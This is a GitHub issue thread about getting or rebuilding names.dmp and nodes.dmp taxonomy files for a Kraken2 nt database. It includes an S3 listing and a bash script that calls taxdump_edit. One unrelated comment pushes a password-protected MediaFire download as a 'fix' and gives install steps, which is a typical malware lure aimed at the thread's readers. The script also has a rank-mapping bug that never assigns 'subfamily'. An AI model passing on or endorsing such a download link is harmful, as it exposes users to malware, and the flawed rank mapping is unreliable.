### ISSUE TITLE
Data request: taxonomy files for nt database

### ISSUE THREAD

**Issue by TomKellyGenetics** [BenLangmead/aws-indexes#34]
Hi @BenLangmead thanks for providing these convenient databases (as well as your excellent open-source software).

First let me explain what we're trying to do and what we've tried so far. Then I'll share why I think you may be able to help us.

We're trying to run downstream processing tools (e.g., `taxpasta`) on `kraken2` results using the "nt" database. These require names.dmp & nodes.dmp files in taxdump format for the taxonomy. I'm able to resolve missing clades individually with the `taxdump_edit` Perl script but this seems an inefficient solution if there are a large number of taxa and the perhaps the data files already exist.

My colleague @BenjaminJPerry has already requested this from the Kraken2 developers but they cite large file size as a reason not to support this. Would the AWS S3 hosting on this repository solve that problem?

https://github.com/DerrickWood/kraken2/issues/848#issuecomment-2297486420

I've noted that the necessary information may be contained in equivalent format in the files mentioned here. 

> Each index includes an inspect.txt file giving the output of the kraken-inspect command.
> As of March 2023, each index includes a ktaxonomy.tsv file giving the output of the make_ktaxonomy.py script from [KrakenTools](https://github.com/jenniferlu717/KrakenTools).

However, several 3rd party tools are particular in requiring .dmp format taxonomy. This includes the [KrakenTools Python script](https://github.com/jenniferlu717/KrakenTools/blob/master/make_ktaxonomy.py) used to generate one of the above files.

> The output file [of make_ktaxonomy.py] is similar to the nodes.dmp/names.dmp file format, but not identical. 

> Required Parameters:
>    --nodes X...........................nodes.dmp file
>    --names X...........................names.dmp file 

I could attempt to reverse this process but I suspect a copy of these files already exists. I've tried to access the free "s3://genome-idx" S3 Bucket via the AWS CLI but even for public access credentials are required (mine in a previous post have expired).

Are you able to share an https link to these taxonomy files or elaborate on how they were generated? I realise you are busy and managing multiple versions. Please note in the thread linked above there are several other users who would benefit from this.

Numerous taxdump files can be found [here by NCBI](https://ftp.ncbi.nlm.nih.gov/pub/taxonomy/taxdump_archive/) but it is unclear which version is correct (or if other data was integrated from elsewhere).

Possibly related issue on this taxonomy: #23
Possibly related issue on versioning here: #27

Version Info: we're using nt database version 2024-05-30 but neither of the archived taxdump files from NBCI in May or June 2024 perfectly match these files.

Kind regards,

Tom Kelly
tom.kelly [at] agresearch.co.nz

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by TomKellyGenetics** [comment]
2 updates:

1. I've managed to access the AWS S3 Bucket via the command-line. The files request do not appear to be hosted on S3.

``` $ aws s3 ls --no-sign-request  s3://genome-idx/kraken/nt_20240530/
2024-06-18 08:13:55  236228428 database100mers.kmer_distrib
2024-06-18 08:14:00  187924293 database150mers.kmer_distrib
2024-06-18 08:14:05  156739102 database200mers.kmer_distrib
2024-06-18 08:14:09  132948381 database250mers.kmer_distrib
2024-06-18 08:14:12  119268027 database300mers.kmer_distrib
2024-06-18 08:14:16  317094598 database50mers.kmer_distrib
2024-06-18 08:14:22  274656914 database75mers.kmer_distrib
2024-06-18 08:14:28 953483108968 hash.k2d
2024-06-18 11:56:04  116712000 inspect.txt
2024-06-18 11:56:07  111130433 ktaxonomy.tsv
2024-06-25 01:44:18 17978027846 library_report.tsv
2024-06-18 11:56:10        826 nt.md5
2024-06-18 11:56:11         64 opts.k2d
2024-06-18 11:56:13 2025685291 seqid2taxid.map
2024-06-18 11:56:45  169313306 taxo.k2d
2024-06-18 11:56:49     792447 unmapped_accessions.txt
```

2. I've created a script to reverse the conversion by KrakenTools [ktaxonomy.py](https://github.com/jenniferlu717/KrakenTools/blob/master/make_ktaxonomy.py), including reversing the following mapping for taxonomy rank. It is essentially a wrapper to pass taxa IDs to [taxdump_edit](https://github.com/guyleonard/taxdump_edit).

```{py}
map_ranks = {'superkingdom':'D',
        'phylum':'P',
        'class':'C',
        'order':'O',
        'family':'F',
        'genus':'G',
        'species':'S'}
```

If it is possible to create the `nodes.dmp` and `names.dmp` files from the contents of the `tar.gz` file I will close this issue.

**Comment by TomKellyGenetics** [comment]
I've tested a solution to this for database "k2_nt_20240530". GitHub size limits won't allow uploading `nodes.dmp` (129MB) or `names.dmp` (115MB) but the following code will generate them from `ktaxonomy.tsv`. I'm willing to share a copy elsewhere if there's a hosting service that allows it.

Note the computation for this script will take 1 week single-threaded.

 [create_taxonomy.sh.txt](https://github.com/user-attachments/files/16925332/create_taxonomy.sh) 

```sh
# create output directory if empty
taxonomy=./k2_nt_20240530/output_taxonomy/
mkdir -p ${taxonomy}
touch ${taxonomy}/nodes.dmp ${taxonomy}/names.dmp

# test dependencies
perl -version | head -n2 | tail -n1
perl /mnt/gpfs/scratch/projects/2023-mbie-rumen-gbs/GBS-TaFFE/resources/taxdump_edit/taxdump_edit.pl  -version | head -n1

echo ""

cat ./k2_nt_20240530/ktaxonomy.tsv |  while read line
do
   # echo $line
   taxID=$(echo $line | cut -d" " -f1)
   parentID=$(echo $line | cut -d" " -f3)
   # echo $taxID belongs to $parentID
   oldrank=$(echo $line | cut -d" " -f5)
   div=0
   div=$(echo $line | cut -d" " -f7)
   fullname=$(echo $line | cut -d" " -f9-)

   newrank="no rank" # default
   if [[ $oldrank == "R"* ]]; then
       newrank="superkingdom" # root
   fi
   if [[ $oldrank == "R" ]]; then
       newrank="no rank" # root
   fi
   if [[ $oldrank == "D"* ]]; then
       newrank="subkingdom" # domain
   fi
   if [[ $oldrank == "D" ]]; then
       newrank="kingdom" # domain
   fi
   if [[ $oldrank == "P"* ]]; then
       newrank="subphylum" # phylum
   fi
   if [[ $oldrank == "P" ]]; then
       newrank="phylum" # phylum
   fi
   if [[ $oldrank == "C"* ]]; then
       newrank="subclass" # class
   fi
   if [[ $oldrank == "C" ]]; then
       newrank="class" # class
   fi
   if [[ $oldrank == "O"* ]]; then
       newrank="suborder" # order
   fi
   if [[ $oldrank == "O" ]]; then
       newrank="order" # order
   fi
   if [[ $oldrank == "F" ]]; then
       newrank="subfamily" # family
   fi
   if [[ $oldrank == "F" ]]; then
       newrank="family" # family
   fi
   if [[ $oldrank == "G"* ]]; then
       newrank="subgenus" # genus
   fi
   if [[ $oldrank == "G" ]]; then
       newrank="genus" # genus
   fi
   if [[ $oldrank == "S"* ]]; then
       newrank="subspecies" # subspecies
   fi
   if [[ $oldrank == "S" ]]; then
       newrank="species" # species
   fi
   #echo $oldrank in ktaxonomy.tsv
   #echo $newrank matches to nodes.dmp
   echo $newrank $fullname is div $div

  ## Run taxdump_edit
  perl /path/to/taxdump_edit/taxdump_edit.pl  -names ${taxonomy}/names.dmp -nodes ${taxonomy}/nodes.dmp -parent $parentID -override $taxID -rank $newrank -division $div -taxa $fullname
done
```

The taxonomic ranks may not match other sources exactly but the tree structure will be compatible with `taxpasta` or similar 3rd-party software.
